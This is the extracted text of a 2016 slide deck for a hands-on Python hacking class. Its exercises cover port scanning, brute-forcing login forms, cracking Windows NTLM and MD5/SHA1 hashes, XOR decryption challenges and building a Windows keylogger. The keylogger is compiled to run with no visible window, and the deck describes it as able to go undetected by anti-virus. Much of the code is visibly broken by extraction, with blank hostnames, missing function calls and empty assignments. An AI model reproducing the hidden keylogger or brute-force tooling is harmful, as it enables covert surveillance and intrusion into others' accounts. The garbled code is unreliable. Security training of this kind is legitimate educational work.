Violent Python: Hacking with Python Presentation

Violent Python
Presented by Richard Gowen @alt_bier for
Richard is a Solution Architect as well as one of the founding board
members of hacker space in Plano, TX.
This class is based on material & projects by Sam Bowne @sambowne
Sam Teaches an Ethical Hacking course at City College of San Francisco and
presented a version of Violent Python at Defcon 23.
Sam’s original slides and projects available at
Much more detail on this topic is available in the book by TJ O’Connor named Violent
Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security
Engineers which is available on Amazon.
Violent Python
What this class is about
This class is about learning to USE PYTHON to do the following:
Jan 2016
Basic port scanning
Scan and manipulate HTTP
Brute force login pages
Port Knocking
Cracking password hashes
Work with XOR encryption
Create a key logger
Anti-virus evasion
Violent Python presented by @alt_bier
Violent Python
What this class IS NOT about
This IS NOT a beginner Python class.
Even if you don’t have a lot of programming experience you can learn
how to make custom hacking tools in Python. But this class will not teach
any of the Python fundamentals that a true beginner Python class would.
This IS NOT a networking or security fundamentals class.
Participants should already be familiar with basic network and security
concepts like TCP/IP and brute force attacks.
This IS NOT about good coding principles.
Leave your nice comments, exception handling and optimization at home.
We are Hackers and are here to BREAK STUFF. We will be writing fast
simple scripts to accomplish our goals and have fun!
Jan 2016
Violent Python presented by @alt_bier
Violent Python
What you will need
• This class has been crafted for students using a Kali Linux 2.0 Live environment running
on either a physical or virtual machine.
• USB sticks with a Kali Linux boot image will be available for use by students. These
can be purchased by those wanting persistence (ability to save files)
• Loaner laptops will be available for any students who need them
• If you will be running in a Live (non-persistent) environment and wish to save the work
you have done in class you will need to either bring a USB storage device or have a
cloud based storage service to save your work to
• All class materials will be available online and will remain available after the class is
over for your future reference. So, the only files you should need to save would be
files you create during the class.
• The target server used in most of the attacks has been configured to be your own
device loopback using scripts that will remain available for download after the class.
So, you can continue to practice anytime.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Getting Started
Start up your Kali Linux 2.0 Live environment
by booting off the USB stick or via whichever
method works for you (virtual machine, etc.).
Open a terminal and type the following to download the install script:
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Getting Started
Type the following to launch the script:
You will need to confirm launch with Y
The script will download
all of the class files and
setup the target server.
The script may pause from
time to time and will notify
you when it is complete.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Getting Started
Once the script is complete it
should have set up several
listeners on your host.
You can verify these are running
by typing the following:
netstat -tuln
This command shows all the tcp and udp listeners on your machine.
You should see several tcp listeners on your localhost address of
Throughout this class we will need to use a target server to hack with our
python scripts. This target server has now been setup on your localhost.
Since a real target could potentially be any IP and not just our localhost we
will be using a DNS name when referencing the target in our scripts.
The name resolves to and will be our target.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Basic Port Scanning with Python
The first step in attempting to compromise a system is to determine the attack vectors
available to that system. An attack vector is a path or means by which we can gain
access to a system and exploit vulnerabilities to produce a desired outcome.
Any system on a TCP/IP network can have attack vectors available on the TCP and/or UDP
ports it accepts connections (listens) on. For example, a web server listens on TCP port 80
and that would be a possible attack vector for that server. However, the ports a server
listens on is only part of an attack vector. We also need to determine the software
serving that port so we can determine if there are vulnerabilities that we can exploit.
Basic port scanning is the process of determining the ports that are open on a system as
well as providing whatever detail is available on the software servicing those ports.
In this section we will use Python to create some basic port scanning tools.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Basic Port Scanning with Python
Making a very simple banner grabber
In Kali Linux open a terminal window and execute this command
to create and edit a new file:
While in the vi editor press i for insert mode and enter this code:
import socket
s = socket.socket()
s.connect(("", 22))
print s.recv(1024)
Press ESC to exit insert mode and press :wq then Enter to save
the file and quit the editor.
Jan 2016
The first line imports the "socket" library, which contains networking functions.
The second line creates a socket object named "s".
The third line connects to the server "" on port 22.
The fourth line receives data from the server and prints it, up to a maximum of 1024 characters.
The fifth line closes the connection.
Violent Python presented by @alt_bier
Violent Python
Basic Port Scanning with Python
Running the banner grabber
In a terminal window execute this command:
You should see an SSH banner similar to this:
SSH-2.0-OpenSSH_6.7p1 Debian-5
This simple tool shows us an open port and the software serving it
Jan 2016
This tool shows us that TCP port 22 is open on our target
It also shows us that it is being served by the software package named OpenSSH
The version of the software is 6.7p1
The software was compiled for a Debian-5 system.
We could now search for keywords openssh 6.7p1 debian-5 exploit in order to determine what
vulnerabilities exist that we could exploit to compromise this system on this attack vector.
Violent Python presented by @alt_bier
Violent Python
Basic Port Scanning with Python
Adding a timeout
In a terminal window open the script in vi again:
Change the port number from 22 to 80. This can be done by typing
the following while in vi: :3s/22/80 then Enter
This tells vi to go to line 3 and substitute the text 22 with 80
Press :wq then Enter to save the file and quit the editor.
Run the script again and see what happens.
Notice that the script just freezes up. This is because an HTTP
server has no banner so the script is waiting for something that
will never appear.
To stop the script press Ctrl + C. Python will report that it was
stopped by a Keyboard Interrupt which is what we just did.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Basic Port Scanning with Python
Adding a timeout
To make the script timeout, we need to add a default timeout
value before we call the socket(). So open the script in
vi again and add the following after the import socket line:
This set the default socket timeout value to two seconds.
Run the script again and see what happens.
Notice that the script does not freeze up this time. After waiting
only two seconds it terminates on its own.
Python will report that it was stopped due to the
socket.timeout value being exceeded and timed out.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Basic Port Scanning with Python
Using variables
In a terminal window execute this to create and edit a new file:
Insert the following code then save and quit:
import socket
s = socket.socket()
target = “”
tport = 80
s.connect((target, tport))
print s.recv(1024)
Run the script and it should timeout, just as it did before.
Jan 2016
The first three lines import the "socket" library, set a default timeout, and create a socket object.
The fourth line creates a variable named target and sets its value to ""
The fifth line creates a variable named tport and sets its value to 80
The sixth line opens a connection to the server in variable target on the port in variable tport.
The last two lines receive data and print it, then close the connection
Violent Python presented by @alt_bier
Violent Python
Basic Port Scanning with Python
Using user input
Modify the script to input the target and tport
variables from the user. We can accomplish this by changing those
lines to receive raw_input() as follows:
target = raw_input(‘Target URL: ‘)
tport = raw_input(‘Target Port: ‘)
In vi you can delete existing lines using dd and then press i to
insert and retype them, or at the position after the = on each line
press D to delete to the end of the line and then press a to append
the new text at the end of that line. Save and quit when complete.
Run the script with URL and Port 80
The script will halt with an error.
That error should say something about integer is required
Jan 2016
The default format for raw_input()is string
The socket.connect() function requires the value for port
to be an integer
Violent Python presented by @alt_bier
Violent Python
Basic Port Scanning with Python
Using user input
To fix this error we must format the user input for the tport
variable to be an integer instead of a string.
Modify the script to wrap the raw_input()inside of
int()which will convert the input from string to integer. The
corrected line should look like the following:
tport = int(raw_input(‘Target Port: ‘))
Now the sport scanner should work.
Use it to grab URL on Port 80 again and it
will time out like before.
Use it to grab URL on Port 22 and it should
display the SSH banner like it did before.
Jan 2016
The default format for raw_input()is string
The socket.connect() function requires the value for port
to be an integer
Violent Python presented by @alt_bier
Violent Python
Basic Port Scanning with Python
Port Scanning Challenge 1: Find A Service
There is another service listening on
on a port number ending in 000; that is, one of these:
1000, 2000, 3000, etc.
The service you want to find has a banner starting with:
“Congratulations! You found the hidden”…
Hunt for this service using your port scanner script until
you find it.
You may see a socket error “connection refused” if
there is no listener on a port. You may also see a listener
error “Sorry.” if it is not the port you are hunting for.
Keep hunting until you find it.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Basic Port Scanning with Python
Port Scanning Challenge 2: Port Knocking
There is hidden service listening on on a port number 3003. To open it you must first send
these packets to “knock”:
A SYN to port 3100 (Note: a connect()call sends a SYN)
A 2 second delay
Another SYN to a hidden port which is one of these: 3100,3200,3300,3400,3500,3600,3700,3800,3900
See this link for questions about delays in Python:
When the server receives the correct knock, port 3003 will be open for 5 seconds and then close.
You must grab the banner from port 3003 during that brief period. The banner starts with “Congratulations!”
Write your own Python script using what you have learned to send a correct port knock and grab the banner
from the hidden service on port 3003.
Having Trouble? Examples Available
As part of the class installation working examples of all of the scripts explained here including the challenge
scripts have been downloaded to ~/violent_python/examples/ These have been provided to help if you get
stuck, not as an alternative to writing your own scripts.
If you are stuck on this challenge an example script is here: ~/violent_python/examples/
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Basic Port Scanning with Python
Some Useful Links Related To This Section
Python network programming
The BSD socket interface in Python
Adding a delay to a Python script
Gotcha - Forgetting Parentheses
CodeCademy Python Online Training:
Jan 2016
Violent Python presented by @alt_bier
Violent Python
HTTP Scanning with Python
Using HEAD to Grab HTTP Banners
In a terminal window execute this to create
and edit a new file:
Insert the following code then save and quit:
import socket
s = socket.socket()
target = raw_input('Target Web Server (like ')
tport = 80
s.connect((target, tport))
s.send('HEAD / HEAD/1.1\nHost: ' + target + '\n\n')
print s.recv(1024)
This code connects on TCP port 80 just like the scanner you made in a previous project, but once it connects, it
sends an HTTP request like this:
The HEAD method grabs only the banner, without getting any pages from the server.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
HTTP Scanning with Python
Using HEAD to Grab HTTP Banners
In a terminal window execute the following:
Enter the target host of
You should see the banner as shown here.
Just For Fun
You can use this script to connect to and display the banner of many web sites.
Just for fun try to display the banner of a public web site.
This code may not work on every web server but try to find one that works.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
HTTP Scanning with Python
Simple POST Login
Launch a web browser (in Kali you can use iceweasel)
and navigate to the following:
This will bring up a simple login form.
Test it with any username and password you like.
Now run Wireshark, and start it sniffing traffic on your
loopback interface (this is where lives).
To do this click on Capture then Interfaces then click the
checkbox next to interface lo and the Start button.
At the top left of the Wireshark window, in the Filter box,
type http and click Apply.
Log in to the web form with username a and password b
In Wireshark, stop the capture and find the packet with an
Info column of “POST /python/login1.php HTTP/1.1”
Jan 2016
Violent Python presented by @alt_bier
Violent Python
HTTP Scanning with Python
Simple POST Login
Right click the “POST /python/login1.php”
line and click “Follow TCP Stream”.
The POST request appears, as shown here.
Notice the portions outlined in red.
These are the essential lines in the request.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
HTTP Scanning with Python
Making a Python HTTP Login Script
In a terminal window execute the following:
Insert the following code then save and quit:
import socket
s = socket.socket()
target = "“
tport = 80
user = raw_input('Username: ')
pw = raw_input('Password: ')
length = len(user) + len(pw) + 5
s.connect((target, tport))
s.send('POST /python/login1.php
HTTP/1.1\nHost: ' + target \
+ "\nContent-Length: " + str(length) \
+ "\nContent-Type: Application/x-www-form-urlencoded" \
+ "\n\nu=" + user + "&p=" + pw )
print s.recv(1024)
This code sends an HTTP POST request in this format:
POST /python/login1.php HTTP/1.1
Content-Type: Application/x-www-form-urlencoded
Jan 2016
Violent Python presented by @alt_bier
Violent Python
HTTP Scanning with Python
Running the HTTP Login Script
In a terminal window execute the following:
Enter a username of a and a password of b
You should see the message:
Credentials Rejected!
Run the script again, this time with a valid
username of root and a
password of password
You should see the message:
Successful Login!
Jan 2016
Violent Python presented by @alt_bier
Violent Python
HTTP Scanning with Python
Python Loops: String Values
We need to understand how to loop through string values in
Python so we can add this functionality to our scripts
In a terminal window execute the following:
Insert this code, as shown below then save and quit.
Do NOT omit the indentation -- in Python, indentation is
required to indicate what code is inside a loop.
for fruit in ["apple", "orange", "bananna"]:
print fruit
print "All Done!"
In a terminal window execute the script:
As you can see, the code loops through all the listed fruits.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
HTTP Scanning with Python
Python Loops: Numeric Values
We need to understand how to loop through numeric values
in Python so we can add this functionality to our scripts
In a terminal window execute the following:
Insert this code, as shown below then save and quit.
Do NOT omit the indentation -- in Python, indentation is
required to indicate what code is inside a loop.
for number in range(1, 5):
print number
print "All Done!“
In a terminal window execute the script:
As you can see, the code loops through all numbers to the
one before the last one listed in range(), that is one - four.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
HTTP Scanning with Python
HTTP Scan Challenge 1: Brtue Forcing a Login Form
Write a script in Python to try all possible credentials and
successfully get into a login form on
Launch a web browser (iceweasel for example) and open
This will bring you to a simple login form.
Test it with any username and password you like.
The Username is one of these: bill, ted, sally, sue
The PIN is a two-digit number, like these: 01 02 03 … 98 99
Write a script that finds the correct credentials and logs in.
Don't forget to start by capturing a login with Wireshark, to
see the correct format of the HTTP request!
Hint: It's a different format than the login1.php page.
When you find the correct user and pin you will be presented
with a success page that also gives you a secret word that
you can only see if properly authenticated.
Having Trouble?
If you are stuck on this challenge an example script is here: ~/violent_python/examples/
Jan 2016
Violent Python presented by @alt_bier
Violent Python
HTTP Scanning with Python
HTTP Scan Challenge 2: Brute Force Four Accounts
Write a script in Python to break into each of four accounts
on a web login form on
Launch a web browser (iceweasel for example) and open
This will bring you to the challenge login form.
Test it with any username and password you like.
You will need to figure out the user names and the pin that
each requires to successfully access the site.
Information shown on the form should be a clue to help
you. There is a link to a hint for additional help.
Use what you have been shown in this section and the
feedback the form provides to help you write a script that
finds the correct credentials and logs into each.
Having Trouble?
If you are stuck on this challenge an example script is here: ~/violent_python/examples/
Jan 2016
Violent Python presented by @alt_bier
Violent Python
HTTP Scanning with Python
Some Useful Links Related To This Section
For Loops
String formatting in Python using % and .format()
Using sys.exit for script termination
Find a string within a string with str.find()
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
The next few slides will demonstrate one possible way of
getting password hashes off a Windows machine.
Since we will be crafting our scripts in a Linux environment the
file created from the steps outlined here will be provided.
Creating a Windows Test User
On your Windows 7 machine, click Start.
Type in CMD and press Shift+Ctrl+Enter.
If a "User Account Control" box pops up, click Yes.
In the Administrator command prompt window,
execute this command:
net user jose password /add
This created a user named jose with a password of password
Downloading and Installing Cain
In a browser, go to
Download Cain & Abel for Windows NT/2000/XP.
Install it with the default options.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Extracting Password Hashes with Cain
On your Windows 7 desktop, right-click the Cain icon and click
"Run as Administrator".
If a "User Account Control" box pops up, click Yes.
In Cain, on the upper set of tabs, click Cracker.
In Cain, move the mouse to the center of the window, over the
empty white space. Right-click and click "Add to list...".
In the "Add NT Hashes from" box, accept the default
selections and click Next.
The password hashes should appear, as shown.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Understanding Password Hashes
There are two password hashes: LM Hashes and NT Hashes.
LM hashes are very old and so weak even Microsoft has finally stopped using them by default in all Windows
versions after Windows XP.
NT hashes are Microsoft's "more secure" hash, used by Windows NT in 1993 and never updated in any way. As
you will see, these hashes are also very weak and easily cracked, especially when compared with other
password hashes.
Notice that the NT password hash for jose starts with 8846. This hash will be the same for anyone on any
Windows 7 machine with a password of password.
This is because Microsoft doesn't salt hashes so the hash for any given password is the same.
That means you can often crack Windows password hashes by just Googling them, because many lists of
common passwords and hashes have been uploaded to the Internet over the last 20 years.
However, we'll be using Python to crack them.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Exporting The Hash To A Text File
In Cain, right-click anywhere in the list and click Export.
Save the file in your Documents folder with the name win1 in
the default format (L0phtCrack 2.x file).
Open the file in Notepad.
You should see all the accounts and their associated hashes
in this file
Note the format of this file as it will be important later.
The NT Hash is the portion of each line after the last colon :
We can now copy this file to our Linux machine to write our
python scripts to crack the password hashes.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Cracking Windows Password Hashes With Python
We will use Python to create scripts that will crack Windows password hashes.
These same techniques work for Linux and Mac hashes, but thousands
of times slower, because Windows uses especially weak hashes.
Getting Test Hashes
In the previous slides, we harvested real password hashes from a
Windows machine with Cain.
We found that a password of 'password' has this hash on Windows:
Windows does not use any salt, so passwords have the same
password hash across systems.
The file that was harvested in the previous slides is located here:
A file with just the NTLM hash for the user jose is located here:
Note: If you want to calculate more test cases, just go use this website:
The NTLM line is the type of hash found on a Windows 7 machine
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Calculating Windows NTLM Password Hashes with Python
In Kali Linux, in a Terminal window, execute this command:
Enter the code shown below:
import hashlib
passwd = raw_input('Enter Password: ')
print'md4', passwd)
Then save and close the file.
The first line loads the hashlib library which provides a common
interface to secure hashes and message digests
The second line gets a password from the user
The third line creates an md4 hash of the given password and
prints it to the screen
Execute the script and give it a password of password
You should see a result like the one shown
(the memory location may be different)
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Calculating Windows NTLM Password Hashes with Python
What you received is a hash, but it's a binary object and all you
see is its memory location.
To see the normal result of this hash in hexadecimal, add the
hexdigest() method like this:
import hashlib
passwd = raw_input('Enter Password: ')
print'md4', passwd).hexdigest()
Run the program again.
This time you should get the exact hash shown
This looks more like a hexadecimal hash, but is it correct for a
Windows password?
If we compare this to the jose hash you can see it is not correct
as the correct NT hash starts with 8846.
This is because the Windows algorithm uses Unicode,
not ASCII, to encode the characters.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Calculating Windows NTLM Password Hashes with Python
To calculate the correct Windows hash we will need to modify
our script to use Unicode like this:
import hashlib
passwd = raw_input('Enter Password: ')
print'md4', passwd.encode('utf-16le')).hexdigest()
(NOTE: the code for Unicode ends in 16 lowercase L lowercase E, NOT 161e.)
Run the program again.
This time you should get the exact hash we expected
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Making a Hash Dictionary
Create a program that calculates the NTLM hashes for all two-digit passwords from 00 to 99.
A hash dictionary is a list of passwords and their associated hashes.
This can be created on the fly and used within a script or exported to a file to be referenced by a script.
In this case we will simply print the output
We will combine what we learned about for loops with what we just learned about hashlib
In a terminal windows create and edit a new file
Enter the following text then save the file
import hashlib
for number in range(0, 100):
passwd = '%02d' % number
print passwd + ' ' +'md4', passwd.encode('utf-16le')).hexdigest()
Execute the script
You should see a list with each line containing a number and its
corresponding Windows NTLM hash
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Using a Hash Dictionary
Create a program that uses a hash dictionary to crack the password of two Windows accounts that used
passwords from 00 to 99.
A file with the hashes for the windows accounts using 2 digit pins is located here:
Copy this file to your current directory where you are creating your scripts by typing
cp ~/violent_python/hash/winpin.txt .
This file contains the following text:
We are going to use this file in a script with our hash dictionary to crack these passwords
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Using a Hash Dictionary
In a terminal window create a new file named and enter the following text in it:
import hashlib
with open('winpin.txt', 'r') as f:
for line in f:
listline = line.split(':')
userhash = listline[4].lower().rstrip('\n')
for number in range(0, 100):
passwd = '%02d' % number
thishash ='md4', passwd.encode('utf-16le')).hexdigest()
if (thishash == userhash):
print 'CRACKED! Hash:' + thishash + ' Password:' + passwd
• The first line imports the hashlib library
• The second line opens the file with our hashes for reading
• The third line reads that file in line by line
• The fourth line splits up each line being read into a list of items separated by ":"
• The fifth line grabs the hash part of the line converts it to lowercase and strips off the trailing newline
• The seventh line creates our hash dictionary item
• The eighth line compares the hash dictionary with the hash from the file
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Using a Hash Dictionary
Execute the script
You should see the cracked passwords
for the hashes in our file
Next we will use what we learned here to
crack some passwords in a few challenges
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Password Challenge 1: Windows NTLM (MD4) Hashes
The following Windows passwords are constructed according to this system: CCSF-username-PIN
Where "username" is the username in lowercase and PIN is a two-digit number.
For example, a user named "Sam" might have a password like this: CCSF-sam-01
Crack these passwords, which were collected from a Windows 7 machine with Cain and saved in this file:
Note that the NTLM (MD4) hash is the rightmost part of each line, after the last colon.
Having Trouble?
If you are stuck on this challenge an example script is here: ~/violent_python/examples/
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Password Challenge 2: MD5 Hashes with Several Rounds
The company using the Windows passwords in the previous challenge sets up an online system, with passwords
formed the same way. Somewhere in the Terms of Service, it strongly warns users not to re-use the same
password as their Windows password.
It is now much more secure, because it uses MD5 instead of MD4, and not only that, it uses many rounds of MD5.
It doesn't use Unicode encoding.
Crack these hashes if you can! They are in this file: ~/violent_python/hash/webpass.txt
Ming: 7621eca98fe6a1885d4f5f56a0525915
Mohammed: b2173861e8787a326fb4476aa9585e1c
sam: 42e646b706acfab0cf8079351d176121
Having Trouble?
If you are stuck on this challenge an example script is here: ~/violent_python/examples/
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Password Challenge 3: Many rounds of MD5 and SHA-1
Somehow, evil hackers broke into the previous Web application.
So the new, super-enhanced system uses a much larger number of MD5 rounds, followed by an even larger
number of SHA1 hash rounds.
The total number of hashing rounds is less than 500, because management is sure that's enough. And now users
must click "I Agree" to a pop-up box agreeing not to re-use passwords, so only a complete idiot would do that.
Crack these hashes if you can! They are in this file: ~/violent_python/hash/superpass.txt
Ming: ce788ed5f855e51e6fd78f923b43a6407467c5f2
Mohammed: 582d99006950cddeb2df9f40b3f65ebc283dc378
sam: da660655f4d4714fe605e9063d1ded4b749c50a9
Having Trouble?
If you are stuck on this challenge an example script is here: ~/violent_python/examples/
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Cracking Password Hashes with Python
Some Useful Links Related To This Section
Python hashlib library
Python Unicode: Encode and Decode Strings
Compound Statements - The WITH Statement
Python Reading and Writing Files
Jan 2016
Violent Python presented by @alt_bier
Violent Python
XOR Encryption in Python
XOR Encryption in Python
In this section we will encrypt and decrypt files using XOR in Python
Understanding XOR
Exclusive OR (XOR) is a fundamental mathematical operation used in many encryption algorithms.
XOR operates on one bit at a time, with these results:
0 XOR 0 = 0
0 XOR 1 = 1
1 XOR 0 = 1
1 XOR 1 = 0
For our purposes, we'll use the Python ^ operator, which acts on a whole byte at a time.
Characters are ASCII-encoded, like this:
A is 01000001
B is 01000010
C is 01000011
A whole table of ASCII values is available here:
Jan 2016
Violent Python presented by @alt_bier
Violent Python
XOR Encryption in Python
Understanding XOR
Consider A^B:
A is 01000001
B is 01000010
A^B= 00000011
That is character 3, an unprintable end-of-text mark.
However, A^s is printable:
A is 01000001
s is 01110011
A^s= 00110010
The result is the hexadecimal value 0x32, or the ASCII numeral 2.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
XOR Encryption in Python
XOR in Python
In a terminal window execute this command to create and edit a new file:
vi xor1
While in the vi editor press i for insert mode and enter this code, as shown below:
import sys
if len(sys.argv) != 4:
print "Usage: ./xor1 infile outfile k“
print "k is a one-character XOR key“
print "For hexadecimal keys, use $'\\x01'“
f = open(str(sys.argv[1]), "rb")
g = open(str(sys.argv[2]), "a")
k = ord(sys.argv[3])
byte =
while byte != "":
xbyte = ord(byte) ^ k
byte =
Press ESC to exit insert mode and press :wq then Enter to save the file and quit the editor.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
XOR Encryption in Python
XOR in Python
Next, we need to make the file executable.
In a Terminal window, execute this command:
chmod a+x xor1
Now lets execute the file. In a Terminal window, execute this command:
You should see the help message, explaining how to use the program
Encrypting a File with XOR in Python
To create a file named plain1 with the letter A in it, execute these commands :
echo -n A > plain1
cat plain1
The "echo -n" command created a file named plain1 which contains
a single letter A, without a carriage return at the end of the file.
The "cat plain1" command printed out the file, which appeared
as a single A at the start of the next line
Jan 2016
Violent Python presented by @alt_bier
Violent Python
XOR Encryption in Python
Encrypting a File with XOR in Python
To encrypt the file plain1 with a key of s , execute these commands :
./xor1 plain1 cipher1 s
cat cipher1
The result is "2".
In a terminal window execute this command to create and edit a new file:
vi plain2
While in the vi editor press i for insert mode and enter
this code, as shown below:
Normal English text; written by YOUR NAME
Press ESC to exit insert mode and press :wq then Enter to
save the file and quit the editor.
To encrypt the file using a key of x, execute these commands:
./xor1 plain2 cipher2 x
cat cipher2
The result is strange unreadable characters
Jan 2016
Violent Python presented by @alt_bier
Violent Python
XOR Encryption in Python
Decrypting a File with XOR in Python
To decrypt a file, simply repeat the XOR operation with the same key.
It will reverse itself.
Execute these commands:
./xor1 cipher2 plain2r x
cat plain2r
The file is restored to readable text
Jan 2016
Violent Python presented by @alt_bier
Violent Python
XOR Encryption in Python
XOR Challenge 1: Decrypting a Text File Without the Key
This one is pretty simple: the key is a capital letter, from A to Z.
To get the ciphertext, execute this command:
cp ~/violent_python/xor/xorchal1-cipher .
Decrypt the file.
When you are successful you should see the contents
which begin with "Congratulations" as shown
Having Trouble?
If you are stuck on this challenge an example script is here: ~/violent_python/examples/
Jan 2016
Violent Python presented by @alt_bier
Violent Python
XOR Encryption in Python
XOR Challenge 2: Decrypting a Text File Without the Key
This one is a bit more challenging. The key is a single byte from \x00 to \xff.
To get the ciphertext, execute this command:
cp ~/violent_python/xor/xorchal2-cipher .
Decrypt the file.
When you are successful you should see the contents
which begin with "Congratulations" as shown
Having Trouble?
If you are stuck on this challenge an example script is here: ~/violent_python/examples/
Jan 2016
Violent Python presented by @alt_bier
Violent Python
XOR Encryption in Python
XOR Challenge 3: Decrypting an Image File Without the Key
This shows how we can encrypt and decrypt more than just text.
The key is a single byte from \x00 to \xff.
To get the ciphertext, execute this command:
cp ~/violent_python/xor/xorchal3-cipher .
This is an image file. When decrypted, it starts with a PNG file header:
The first 4 bytes are 89, 50, 4E, 47; the 2nd through 4th byte spell out PNG in ASCII.
Decrypt the file.
When you get it, change its filename extension to PNG
then open it in an image viewer or web browser.
Having Trouble?
If you are stuck on this challenge an example script is here: ~/violent_python/examples/
Jan 2016
Violent Python presented by @alt_bier
Violent Python
XOR Encryption in Python
XOR Challenge 4: Decrypting an Image File Without the Two Byte Key
The key is two bytes from \x0000 to \xffff.
To get the ciphertext, execute this command:
cp ~/violent_python/xor/xorchal4-cipher .
This is an image file. When decrypted, it starts with a JPEG file header:
The first 2 bytes are FFD8, and some later bytes contain the ASCII characters JFIF.
Decrypt the file.
When you get it, change its filename extension to JPG
then open it in an image viewer or web browser.
Having Trouble?
If you are stuck on this challenge an example script is here: ~/violent_python/examples/
Jan 2016
Violent Python presented by @alt_bier
Violent Python
XOR Encryption in Python
Some Useful Links Related To This Section
XOR Cipher
Binary bitwise operators
Built-in functions including chr() ord() and hex()
Reading command line arguments with sys.argv
PNG file format
JPEG file format
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
In this section you will learn how to make real keyloggers that can go undetected by anti-virus software.
Software like this can be used to commit real crimes. So: ONLY RUN THIS ON YOUR OWN TEST SYSTEMS
What is a Keylogger?
Keystroke logging which is also known as keylogging refers to
the action of recording (logging) the keys struck on a keyboard,
typically covertly, so the person using they keyboard is unaware
that their actions are being monitored. Software that records
keystrokes is called a keylogger.
The next few slides will demonstrate how to create a keylogger
on a Windows machine.
While we will walk through these steps for Windows this will
not be a hands on lab in the classroom.
Feel free to try this in your own lab outside of this class.
A Linux keylogger hands on lab will follow the Windows section.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
Windows Keylogger with Python
In this section you will learn how to make a Windows keylogger with Python.
This is a very common and dangerous form of malware.
Prepare The Windows Environment
We need to install some software to prepare the Windows environment to write our
• Install Python. Browse to then
download the Python 2.7.6 Windows MSI Installer. Install the software with the
default options.
• Install PyWin32. Browse to select build 218
then choose the file pywin32-218.win32-py2.7.exe Download and execute this
• Install pip-Win. Browse to and
click Download. Run the file. It will install via a command line window which will ask
you to press any key to continue many times. When it is ready it will open a pip-Win
dialog box. We will use this later, you can close it for now.
• Install a C Compiler. Browse to then
download and run vcsetup.exe. Click next, accept the license and click next then
uncheck Silverlight and Microsoft SQL Server and click next and install. Wait for the
software to download and install and restart if you are prompted to.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
Prepare The Windows Environment
Jan 2016
Install Swig. Browse to
and download the version listed on the line starting with
Windows users should download… save the zip file on your
desktop and extract it there. Navigate to the extracted folder
and find the file swig.exe and right click it then choose copy.
Navigate to C:\Windows\System32\ and right click and empty
area in that window and click paste. If you get a popup
regarding Administrator permission click continue.
Install PyInstaller. Open pip-win and in the command field enter
the following: venv –c –I pyi-env-name and click run. This
will open a command prompt beginning with <pyi-env-name>.
In this command prompt execute the following:
pip install PyInstaller
PyInstaller will then download and install
When complete close the command prompt but leave the pip-win
GUI box running
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
Prepare The Windows Environment
Download PyHook. Browse to
and download the file save the zip file on your
desktop and extract it there.
Install PyHook. In thepip-win GUI type the following in the command field:
venv pyi-env-name then click run. This will open a command prompt
beginning with <pyi-env-name>. In this command prompt execute the
following commands (change the user name and software directory
names as needed):
Set SWIG_LIB=C:\Users\Administrator\Desktop\swigwin-3.0.8\swigwin-3.0.8\Lib
Cd C:\Users\Administrator\Desktop
Cd pyHook-1.5.1\pyHook-1.5.1 install
When complete leave the command prompt open as we will need it again
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
Writing the Keylogger in Python
Open notepad and enter the following code:
import pythoncom, pyHook, sys, logging
def OnKeyboardEvent(event):
print "Key: ", chr(event.Ascii)
return True
hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
Replace YOURNAME with your own name and save it as on your Desktop. When saving, use
the “Save as” type of “All Files” to prevent notepad from
adding a .txt extension.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
Running the Keylogger
In the command prompt enter the following commands:
cd C:\Users\Administrator\Desktop
Open notepad and type in your name.
You should see the keystrokes being captured.
Stopping the Keylogger
Close Notepad.
Close the command prompt.
In the pip-win box click run which will open up a new
command prompt that is not running the key logger.
Jan 2016
Violent Python presented by @alt_bier
Violent Python
Keylogger with Python
Compiling the Keylogger
In the command prompt enter the following commands:
cd C:\Users\Administrator\Desktop
pyinstaller --onefile --noconsole
A folder named Dist should now be present on your desktop.
Navigate into this folder and you should see your executable
keylogger named YOURNAME-keylog.exe
Running the Keylogger Executable
Double click on YOURNAME-keylog.exe to run it.
No window will open.
To verify it is running run Task Manager.
On the processes tab you can see the keylogger running
Jan 2016
Violent Python presented by @alt_bier
Violent Python
